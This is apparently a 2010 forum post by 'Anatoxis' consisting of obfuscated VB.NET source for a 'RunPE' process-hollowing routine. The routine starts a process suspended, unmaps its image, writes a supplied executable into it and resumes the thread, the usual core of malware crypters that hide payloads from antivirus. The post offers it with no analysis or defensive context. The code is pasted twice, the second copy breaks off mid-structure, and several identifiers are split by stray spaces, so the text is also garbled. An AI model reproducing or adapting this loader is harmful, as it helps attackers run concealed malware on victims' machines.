Anatoxis
30.05.2010, 23:05
' Function to Call RunPE is : nTFHDHWFgaoSbRwwbvQbG
Imports System.Runtime.InteropServices
Imports System.ComponentModel
Public Class oOuvQpqDXVEKcjKNMEVuK
Public Const KYNKQAfIHOmeKwdAPZFvW As Long = &H200
Public Const GvPgmDqltaJnZliRncoRo As Long = &H40
Public Const ZIgrlMfrdTqKHAFDqBYRD As Long = &H80
Public Const UfiQKPrXTeNTWmKUQEKlV As Long = &H20
Public Const opBbKYgcDYvnDCdGTZrlg As Long = &H10
Public Const KBSnJhVhkRfKiOApWvbls As Long = &H8
Public Const FZTMfjgOacCTADEJuBNHN As Long = &H1
Public Const YikXfsVTKVjneQYtAWuIZ As Long = &H4
Public Const UJmtDvgAAhHwtFdMYZfbr As UInt32 = &H2
Shared Sub nTFHDHWFgaoSbRwwbvQbG(ByVal JcWTDQLKQTYmIeTieTAcR() As Byte, ByVal FDYpYSWoGfsvYTYCFWjvk As String)
Dim YMoDYbLtnYcSFgrlIsTvv = New UkqZueWadjAbUVwFfvESQ.ntJltnMfNdhvChSoiTmSc, JGawtwBkuWRSgumblpWSo As UkqZueWadjAbUVwFfvESQ.FecVSCMRkhlbvjrsMsHmJ, YnsgRLBWTaWvdvNePQpmV = New UkqZueWadjAbUVwFfvESQ.UOuFnNMCJmqHskSvnTaIn, nXNRnWBIqfabZAmhqpKJB = New UkqZueWadjAbUVwFfvESQ.JhecmfoNaYKuHMITtNsJN, FHgBLiCqQkfGWBNkTQdcf = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr, UpBigtCcnojjTDloupwwM = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr
Dim nBSugFohXhTGAPIaANgwY = GCHandle.Alloc(JcWTDQLKQTYmIeTieTAcR, GCHandleType.Pinned)
Dim JKiIgOemGbDafcbMDjRAj As Integer = nBSugFohXhTGAPIaANgwY.AddrOfPinnedObject.ToInt32
Dim FikeERpTtmYjuRgdbmCTF As New UkqZueWadjAbUVwFfvESQ.YsDqEaeYdfIGbeDPeKjTQ
FikeERpTtmYjuRgdbmCTF = Marshal.PtrToStructure(nBSugFohXhTGAPIaANgwY.AddrO fPinnedObject, FikeERpTtmYjuRgdbmCTF.GetType)
nBSugFohXhTGAPIaANgwY.Free()
If UkqZueWadjAbUVwFfvESQ.CreateProcess(Nothing, FDYpYSWoGfsvYTYCFWjvk, FHgBLiCqQkfGWBNkTQdcf, UpBigtCcnojjTDloupwwM, False, 4, Nothing, Nothing, nXNRnWBIqfabZAmhqpKJB, YnsgRLBWTaWvdvNePQpmV) = 0 Then Return
Dim USFPadpFTrcPqTHgFNVmi As New UkqZueWadjAbUVwFfvESQ.ncWaZleKDkMjYfbSIjFnu
USFPadpFTrcPqTHgFNVmi = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ), USFPadpFTrcPqTHgFNVmi.GetType)
Dim JlmlZuTPkduGFsuFLHmnJ, FMoKvAftapRPVhCWiKYJb As Long, YVIWuJUBKiBiCtWIlgIKn As UInteger
nXNRnWBIqfabZAmhqpKJB.TtJsTMffAtVrRibZMjrdI = Len(nXNRnWBIqfabZAmhqpKJB)
YMoDYbLtnYcSFgrlIsTvv.nGaGTVUkgmFOwvuLPHbdT = 65538
If USFPadpFTrcPqTHgFNVmi.JPqSSdJpQgnidKRuSdLef <> 17744 Or FikeERpTtmYjuRgdbmCTF.EnsnogUWGrKrswVOqguAA <> 23117 Then Return
If UkqZueWadjAbUVwFfvESQ.GetThreadContext(YnsgRLBWTaW vdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv) And UkqZueWadjAbUVwFfvESQ.ReadProcessMemory(YnsgRLBWTa WvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, JlmlZuTPkduGFsuFLHmnJ, 4, 0) >= 0 And UkqZueWadjAbUVwFfvESQ.ZwUnmapViewOfSection(YnsgRLB WTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, JlmlZuTPkduGFsuFLHmnJ) >= 0 Then
Dim IqvvMNwSuigOEaknaChUE As UInt32 = UkqZueWadjAbUVwFfvESQ.VirtualAllocEx(YnsgRLBWTaWvd vNePQpmV.TXNYMsVHdwOXpBuSUHQUe, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.XaQfhY AETnkrBbLqDaDoi, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.TBSEGb LhJBIDQRQKbdlKD, 12288, 4)
If IqvvMNwSuigOEaknaChUE <> 0 Then
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE, JcWTDQLKQTYmIeTieTAcR, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.mKiPFk AmqrpWudjueCWLP, YVIWuJUBKiBiCtWIlgIKn)
FMoKvAftapRPVhCWiKYJb = FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ + 248
For IUCbFtmralZqcqGghXGLb As Integer = 0 To USFPadpFTrcPqTHgFNVmi.ErDAbwAYQwtCrfLAIaoet.XEULaH mdApdWYrejLwZfI - 1
JGawtwBkuWRSgumblpWSo = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FMoKvAftapRPVhCWiKYJb + IUCbFtmralZqcqGghXGLb * 40), JGawtwBkuWRSgumblpWSo.GetType)
Dim TcWhwKBKnEBfngjDiCKBa(JGawtwBkuWRSgumblpWSo.mlmswT nPXuiCVtGmlXsBl) As Byte
For IuGHvccUGnSWCIZYptcBA As Integer = 0 To JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl - 1 : TcWhwKBKnEBfngjDiCKBa(IuGHvccUGnSWCIZYptcBA) = JcWTDQLKQTYmIeTieTAcR(JGawtwBkuWRSgumblpWSo.EVIdUf nBtBmfSuepPwNVS + IuGHvccUGnSWCIZYptcBA) : Next
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, TcWhwKBKnEBfngjDiCKBa, JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl, YVIWuJUBKiBiCtWIlgIKn)
UkqZueWadjAbUVwFfvESQ.VirtualProtectEx(YnsgRLBWTaW vdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, JGawtwBkuWRSgumblpWSo.XfYoUocGdsXCwKAcSUvVe.mlmswT nPXuiCVtGmlXsBl, TFaNpqnkTGrLOwFtqXgow(JGawtwBkuWRSgumblpWSo.nGaGTV UkgmFOwvuLPHbdT), JlmlZuTPkduGFsuFLHmnJ)
Next IUCbFtmralZqcqGghXGLb
Dim mPqZpCdpDwbftLZfttQpL = BitConverter.GetBytes(IqvvMNwSuigOEaknaChUE)
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, mPqZpCdpDwbftLZfttQpL, 4, YVIWuJUBKiBiCtWIlgIKn)
YMoDYbLtnYcSFgrlIsTvv.IYKkoLSukqLBaYsRwRBpW = IqvvMNwSuigOEaknaChUE + USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.JlmlZu TPkduGFsuFLHmnJ
UkqZueWadjAbUVwFfvESQ.SetThreadContext(YnsgRLBWTaW vdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv)
UkqZueWadjAbUVwFfvESQ.ResumeThread(YnsgRLBWTaWvdvN ePQpmV.YwMCopKbnkrOaMpBtEeAM)
End If
End If
End Sub
Private Shared Function EwMJNOdbaEfKpNAiXUjLp(ByVal TgeqjZdMwIknmPYlAtFfV As Long, ByVal XIcUNXSgKuQeXZUUaqTMD As Long) As Long
EwMJNOdbaEfKpNAiXUjLp = mqvFiiTSgCUKTbsYDRmfh(TgeqjZdMwIknmPYlAtFfV) / (2 ^ XIcUNXSgKuQeXZUUaqTMD)
End Function
Private Shared Function mqvFiiTSgCUKTbsYDRmfh(ByVal ICOQirIXQsEeBoOKGnWgt As Long) As Double
Const EaQmHuTDGGZnQdTbeqICO = 4294967296.0#
If ICOQirIXQsEeBoOKGnWgt < 0 Then
mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt + EaQmHuTDGGZnQdTbeqICO
Else
mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt
End If
End Function
Private Shared Function TFaNpqnkTGrLOwFtqXgow(ByVal XjgAGGIJnAJKvpnNhOpCa As Long) As Long
Dim SKiWcJTmdLdTNeseIRbWs() As Object = {FZTMfjgOacCTADEJuBNHN, opBbKYgcDYvnDCdGTZrlg, UJmtDvgAAhHwtFdMYZfbr, UfiQKPrXTeNTWmKUQEKlV, YikXfsVTKVjneQYtAWuIZ, GvPgmDqltaJnZliRncoRo, YikXfsVTKVjneQYtAWuIZ, YikXfsVTKVjneQYtAWuIZ}
TFaNpqnkTGrLOwFtqXgow = SKiWcJTmdLdTNeseIRbWs(EwMJNOdbaEfKpNAiXUjLp(XjgAGG IJnAJKvpnNhOpCa, 29))
End Function
<EditorBrowsable(1)> Friend Class UkqZueWadjAbUVwFfvESQ
<StructLayout(0)> Structure ntJltnMfNdhvChSoiTmSc
Dim nGaGTVUkgmFOwvuLPHbdT, mTCibRIrNENnrrOQLnLWG, IdStbavwuuuJZGiDOLsWS, DDUSAdJdjJSTosmTmOeqk, XNkewmviTCCmVIJGpkOqw, SlmCVpJPJNWvkuOXPnAMR, luGOVBvUqHGSSJhJSLhMd As UInt32, IGWZUKlZaAomwWEsVhRNo As IGWZUKlZaAomwWEsVhRNo
Dim DeYvqMwGQLLvPLJMtkDgJ, WopKqVlLAFsStXcvwIkgV, SOqgPYwpnQPbLMhPXLWDn, lYKrOhluWJAvqZDCahGDC, HhaFOqaCGChSXmXldFnDO, DIcbjsmgtOEbmbcFDIZXg, mgejMEKNNpwrWNQEXdAUq, WRtnjEbldHluUnvoGeJXr, SpvMIHmRTSIHjcDIehrqN, IYKkoLSukqLBaYsRwRBpW, lCOXHQbXDMqaQpXrhFcrY, HLfjHZQckFauvEqekbMrk, DjgHdcbIaQuGNqvuLeuNF, WsATckROJJeasGRhOCfOR, STCpBncrwVCjKsWBmFQhj, lcSDBwRwgOjGoHqkpbAhv As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim HmjPAIGEQHTaWUMWswiiJ As Byte()
End Structure
<StructLayout(0)> Structure IGWZUKlZaAomwWEsVhRNo
Dim DNklWLRiGTnjlJRnSCTEb, WWEwWUHnnMXGSVlZVYEEn, SuGVrWSUdXsPhKpqtbmYI, lGWgrfHZNRciPXMdwwWYU, HQnsrotetKMFtkfPCVHYg, DnpRPrHLjVgOMZkgaYprB, WAIcPDtQTORiqlHSduZsM As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RYKBlFIuJalrIaMjDwLOf As Byte()
Dim lhaMkOuCqTVOnnfVHVsOq As UInt32
End Structure
Structure XfYoUocGdsXCwKAcSUvVe
Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32
End Structure
Structure FecVSCMRkhlbvjrsMsHmJ
Dim HqrYkXjHaMFiUCCIKrcPF As Byte, XfYoUocGdsXCwKAcSUvVe As XfYoUocGdsXCwKAcSUvVe, JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl, EVIdUfnBtBmfSuepPwNVS, CRtuJaulQYarjoGYhuOiX, WbMIIjjqARKOREaLkSvij, RBOeemuWnceXgqfcLVhFE, kLfqevkcWVOrNFBOOrRFQ, nGaGTVUkgmFOwvuLPHbdT As UInt32
End Structure
Structure UOuFnNMCJmqHskSvnTaIn
Dim TXNYMsVHdwOXpBuSUHQUe, YwMCopKbnkrOaMpBtEeAM As IntPtr, HUvEdGZhGPvNsSVARPBFb, CsAaCJkNtaTWKHaRpSkZt As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure JhecmfoNaYKuHMITtNsJN
Dim TtJsTMffAtVrRibZMjrdI As Integer, VEQlCSZTdTDqpTtDsoUZI, RcSKXVkwTfXCHIBUSrGsa, kmjWXeaEDYHWlVUHVPntm As String, GvChXnPJkRpqTioqYlXtB, IuGHvccUGnSWCIZYptcBA, CWEGspanZdMCiXtKwoJPT, VfURsBPsJWtWPjPtCMqQe, RGWnREaZwhQfeYUNaPcjA, kPnCQNPegaACMlowdlMjL, GZGNQWFjQUiWqAKjgJtkX, nGaGTVUkgmFOwvuLPHbdT As Integer
Dim CAIjmYQQGfFfJmPCHMfGp, VJZvlhFVnYmBnCimKiPGE As Short, RhaTKkQCdkJKFonGhlAZW, kqrfKtFHMdrekDKpkJiai, GDKqJFsMtWbBRQdbnfSat, CaMPfIGqjhvKgFisOiDtO As Integer
End Structure
<StructLayout(0)> Structure YRwNLrowAdPaEOgXXmNdr
Dim VkdbfRsvTbfeORFeRGlua As Integer, RLfADTGbJmDndGJvpJWQs As IntPtr, kUvLDcshqfkKKTdisfGQH As Integer
End Structure
<StructLayout(0)> Structure YsDqEaeYdfIGbeDPeKjTQ
Dim EnsnogUWGrKrswVOqguAA, GdPWDlhmaZUepgwUvDoRT, CEQsYotSQkonHVElVGZkl, mwqbjwqZvYOimAiXLYfuG, mlmswTnPXuiCVtGmlXsBl, IIJniIfefSvETNEJOtPuR, EgLLHKqLVdTNiCJamwBRj, lcSDBwRwgOjGoHqkpbAhv, XpcXHTgQFWDhQOcMpViRv, qCsiGcVVmPkEubwwsrSRK, mZuHcfgCcbHNMQEPTtEkc, IjOTcoVHMUohrcXCWSllo, EKPpBrgkCfMqJRcTtVWHJ, XTgDACWqiZtNnewFwrHHU As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim VEQlCSZTdTDqpTtDsoUZI As UInt16()
Dim qcwOALLvSSdhVqSoCPoIg, mDBkWOWbIdAqkfXIaSZbB As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim VJZvlhFVnYmBnCimKiPGE As UInt16()
Dim JlmlZuTPkduGFsuFLHmnJ As Int32
End Structure
Structure ncWaZleKDkMjYfbSIjFnu
Dim JPqSSdJpQgnidKRuSdLef As UInt32, ErDAbwAYQwtCrfLAIaoet As INSwVXLgpWhNSsqrdoKbN, ERwUhPKvktDXTPpHAEToX As EkTVraWNfiFWhhvLErsvf
End Structure
<StructLayout(0)> Structure INSwVXLgpWhNSsqrdoKbN
Dim XukgqjLSPbmpOtSvHPcvr, XEULaHmdApdWYrejLwZfI As UInt16, qGDsqsBXwUWMtJlhKlNvF, EKPpBrgkCfMqJRcTtVWHJ, meFQPuMEmgqVLvqBhovSY As UInt32, mlmswTnPXuiCVtGmlXsBl, nGaGTVUkgmFOwvuLPHbdT As UInt16
End Structure
<StructLayout(0)> Structure EkTVraWNfiFWhhvLErsvf
Public EnsnogUWGrKrswVOqguAA As UInt16, InWcOGBJVZbppKNkkMgSj, EOYBkJMnLkvBHARELPRlE As Byte, XXoMkSBssefVmMlnOlBmQ, qhIYjbnAcXPpTZHaRJjmc, mIJuIdCeSikBjOMqpMUIu, JlmlZuTPkduGFsuFLHmnJ, IRaIImojCbUVQagdsiEJJ, JcWTDQLKQTYmIeTieTAcR, XaQfhYAETnkrBbLqDaDoi As UInt32, EpcedpCQpnoefPluTlncb, XBspdBoVZgYBNcHgWJXcm As UInt32
Public qLMEdKdaIZIUrobSZfHdB, miOaBNpHvlddJdfjwiqwT, IselBVeMfeNAoqCVCGawf, DTgKXYppVphJGfHmaJMSA, XcwWWhevFiRdkraZdftTM, qlQhWqTDmcCASHuLgDdTX As UInt16, lMSGstegcnWJhtCcHGPmq, TBSEGbLhJBIDQRQKbdlKD, mKiPFkAmqrpWudjueCWLP, qCsiGcVVmPkEubwwsrSRK As UInt32, IWiRrFUlMgGdPIVOKcwnE, nGaGTVUkgmFOwvuLPHbdT As UInt16
Public DtknQHfSCsamevafhfiJW, WGDCQQUXilLJLKtRlDSJi, pPUNPZJcSescqXQEoZCKu, lnWjlcUJIqPmIMVUOcldP, HwmullKOpjwImYoHRAVdb, DXoTJnVsfuTRENtYpDGAt As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public WhIfJwKAPnEljaQKsZoAH As WhIfJwKAPnEljaQKsZoAH()
End Structure
<StructLayout(0)> Structure WhIfJwKAPnEljaQKsZoAH
Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As YRwNLrowAdPaEOgXXmNdr, ByRef thread As YRwNLrowAdPaEOgXXmNdr, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As JhecmfoNaYKuHMITtNsJN, <Out()> ByRef info As UOuFnNMCJmqHskSvnTaIn) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean
End Class
End Class
Imports System.Runtime.InteropServices
Imports System.ComponentModel
Public Class oOuvQpqDXVEKcjKNMEVuK
Public Const KYNKQAfIHOmeKwdAPZFvW As Long = &H200
Public Const GvPgmDqltaJnZliRncoRo As Long = &H40
Public Const ZIgrlMfrdTqKHAFDqBYRD As Long = &H80
Public Const UfiQKPrXTeNTWmKUQEKlV As Long = &H20
Public Const opBbKYgcDYvnDCdGTZrlg As Long = &H10
Public Const KBSnJhVhkRfKiOApWvbls As Long = &H8
Public Const FZTMfjgOacCTADEJuBNHN As Long = &H1
Public Const YikXfsVTKVjneQYtAWuIZ As Long = &H4
Public Const UJmtDvgAAhHwtFdMYZfbr As UInt32 = &H2
Shared Sub nTFHDHWFgaoSbRwwbvQbG(ByVal JcWTDQLKQTYmIeTieTAcR() As Byte, ByVal FDYpYSWoGfsvYTYCFWjvk As String)
Dim YMoDYbLtnYcSFgrlIsTvv = New UkqZueWadjAbUVwFfvESQ.ntJltnMfNdhvChSoiTmSc, JGawtwBkuWRSgumblpWSo As UkqZueWadjAbUVwFfvESQ.FecVSCMRkhlbvjrsMsHmJ, YnsgRLBWTaWvdvNePQpmV = New UkqZueWadjAbUVwFfvESQ.UOuFnNMCJmqHskSvnTaIn, nXNRnWBIqfabZAmhqpKJB = New UkqZueWadjAbUVwFfvESQ.JhecmfoNaYKuHMITtNsJN, FHgBLiCqQkfGWBNkTQdcf = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr, UpBigtCcnojjTDloupwwM = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr
Dim nBSugFohXhTGAPIaANgwY = GCHandle.Alloc(JcWTDQLKQTYmIeTieTAcR, GCHandleType.Pinned)
Dim JKiIgOemGbDafcbMDjRAj As Integer = nBSugFohXhTGAPIaANgwY.AddrOfPinnedObject.ToInt32
Dim FikeERpTtmYjuRgdbmCTF As New UkqZueWadjAbUVwFfvESQ.YsDqEaeYdfIGbeDPeKjTQ
FikeERpTtmYjuRgdbmCTF = Marshal.PtrToStructure(nBSugFohXhTGAPIaANgwY.AddrO fPinnedObject, FikeERpTtmYjuRgdbmCTF.GetType)
nBSugFohXhTGAPIaANgwY.Free()
If UkqZueWadjAbUVwFfvESQ.CreateProcess(Nothing, FDYpYSWoGfsvYTYCFWjvk, FHgBLiCqQkfGWBNkTQdcf, UpBigtCcnojjTDloupwwM, False, 4, Nothing, Nothing, nXNRnWBIqfabZAmhqpKJB, YnsgRLBWTaWvdvNePQpmV) = 0 Then Return
Dim USFPadpFTrcPqTHgFNVmi As New UkqZueWadjAbUVwFfvESQ.ncWaZleKDkMjYfbSIjFnu
USFPadpFTrcPqTHgFNVmi = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ), USFPadpFTrcPqTHgFNVmi.GetType)
Dim JlmlZuTPkduGFsuFLHmnJ, FMoKvAftapRPVhCWiKYJb As Long, YVIWuJUBKiBiCtWIlgIKn As UInteger
nXNRnWBIqfabZAmhqpKJB.TtJsTMffAtVrRibZMjrdI = Len(nXNRnWBIqfabZAmhqpKJB)
YMoDYbLtnYcSFgrlIsTvv.nGaGTVUkgmFOwvuLPHbdT = 65538
If USFPadpFTrcPqTHgFNVmi.JPqSSdJpQgnidKRuSdLef <> 17744 Or FikeERpTtmYjuRgdbmCTF.EnsnogUWGrKrswVOqguAA <> 23117 Then Return
If UkqZueWadjAbUVwFfvESQ.GetThreadContext(YnsgRLBWTaW vdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv) And UkqZueWadjAbUVwFfvESQ.ReadProcessMemory(YnsgRLBWTa WvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, JlmlZuTPkduGFsuFLHmnJ, 4, 0) >= 0 And UkqZueWadjAbUVwFfvESQ.ZwUnmapViewOfSection(YnsgRLB WTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, JlmlZuTPkduGFsuFLHmnJ) >= 0 Then
Dim IqvvMNwSuigOEaknaChUE As UInt32 = UkqZueWadjAbUVwFfvESQ.VirtualAllocEx(YnsgRLBWTaWvd vNePQpmV.TXNYMsVHdwOXpBuSUHQUe, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.XaQfhY AETnkrBbLqDaDoi, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.TBSEGb LhJBIDQRQKbdlKD, 12288, 4)
If IqvvMNwSuigOEaknaChUE <> 0 Then
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE, JcWTDQLKQTYmIeTieTAcR, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.mKiPFk AmqrpWudjueCWLP, YVIWuJUBKiBiCtWIlgIKn)
FMoKvAftapRPVhCWiKYJb = FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ + 248
For IUCbFtmralZqcqGghXGLb As Integer = 0 To USFPadpFTrcPqTHgFNVmi.ErDAbwAYQwtCrfLAIaoet.XEULaH mdApdWYrejLwZfI - 1
JGawtwBkuWRSgumblpWSo = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FMoKvAftapRPVhCWiKYJb + IUCbFtmralZqcqGghXGLb * 40), JGawtwBkuWRSgumblpWSo.GetType)
Dim TcWhwKBKnEBfngjDiCKBa(JGawtwBkuWRSgumblpWSo.mlmswT nPXuiCVtGmlXsBl) As Byte
For IuGHvccUGnSWCIZYptcBA As Integer = 0 To JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl - 1 : TcWhwKBKnEBfngjDiCKBa(IuGHvccUGnSWCIZYptcBA) = JcWTDQLKQTYmIeTieTAcR(JGawtwBkuWRSgumblpWSo.EVIdUf nBtBmfSuepPwNVS + IuGHvccUGnSWCIZYptcBA) : Next
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, TcWhwKBKnEBfngjDiCKBa, JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl, YVIWuJUBKiBiCtWIlgIKn)
UkqZueWadjAbUVwFfvESQ.VirtualProtectEx(YnsgRLBWTaW vdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, JGawtwBkuWRSgumblpWSo.XfYoUocGdsXCwKAcSUvVe.mlmswT nPXuiCVtGmlXsBl, TFaNpqnkTGrLOwFtqXgow(JGawtwBkuWRSgumblpWSo.nGaGTV UkgmFOwvuLPHbdT), JlmlZuTPkduGFsuFLHmnJ)
Next IUCbFtmralZqcqGghXGLb
Dim mPqZpCdpDwbftLZfttQpL = BitConverter.GetBytes(IqvvMNwSuigOEaknaChUE)
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, mPqZpCdpDwbftLZfttQpL, 4, YVIWuJUBKiBiCtWIlgIKn)
YMoDYbLtnYcSFgrlIsTvv.IYKkoLSukqLBaYsRwRBpW = IqvvMNwSuigOEaknaChUE + USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.JlmlZu TPkduGFsuFLHmnJ
UkqZueWadjAbUVwFfvESQ.SetThreadContext(YnsgRLBWTaW vdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv)
UkqZueWadjAbUVwFfvESQ.ResumeThread(YnsgRLBWTaWvdvN ePQpmV.YwMCopKbnkrOaMpBtEeAM)
End If
End If
End Sub
Private Shared Function EwMJNOdbaEfKpNAiXUjLp(ByVal TgeqjZdMwIknmPYlAtFfV As Long, ByVal XIcUNXSgKuQeXZUUaqTMD As Long) As Long
EwMJNOdbaEfKpNAiXUjLp = mqvFiiTSgCUKTbsYDRmfh(TgeqjZdMwIknmPYlAtFfV) / (2 ^ XIcUNXSgKuQeXZUUaqTMD)
End Function
Private Shared Function mqvFiiTSgCUKTbsYDRmfh(ByVal ICOQirIXQsEeBoOKGnWgt As Long) As Double
Const EaQmHuTDGGZnQdTbeqICO = 4294967296.0#
If ICOQirIXQsEeBoOKGnWgt < 0 Then
mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt + EaQmHuTDGGZnQdTbeqICO
Else
mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt
End If
End Function
Private Shared Function TFaNpqnkTGrLOwFtqXgow(ByVal XjgAGGIJnAJKvpnNhOpCa As Long) As Long
Dim SKiWcJTmdLdTNeseIRbWs() As Object = {FZTMfjgOacCTADEJuBNHN, opBbKYgcDYvnDCdGTZrlg, UJmtDvgAAhHwtFdMYZfbr, UfiQKPrXTeNTWmKUQEKlV, YikXfsVTKVjneQYtAWuIZ, GvPgmDqltaJnZliRncoRo, YikXfsVTKVjneQYtAWuIZ, YikXfsVTKVjneQYtAWuIZ}
TFaNpqnkTGrLOwFtqXgow = SKiWcJTmdLdTNeseIRbWs(EwMJNOdbaEfKpNAiXUjLp(XjgAGG IJnAJKvpnNhOpCa, 29))
End Function
<EditorBrowsable(1)> Friend Class UkqZueWadjAbUVwFfvESQ
<StructLayout(0)> Structure ntJltnMfNdhvChSoiTmSc
Dim nGaGTVUkgmFOwvuLPHbdT, mTCibRIrNENnrrOQLnLWG, IdStbavwuuuJZGiDOLsWS, DDUSAdJdjJSTosmTmOeqk, XNkewmviTCCmVIJGpkOqw, SlmCVpJPJNWvkuOXPnAMR, luGOVBvUqHGSSJhJSLhMd As UInt32, IGWZUKlZaAomwWEsVhRNo As IGWZUKlZaAomwWEsVhRNo
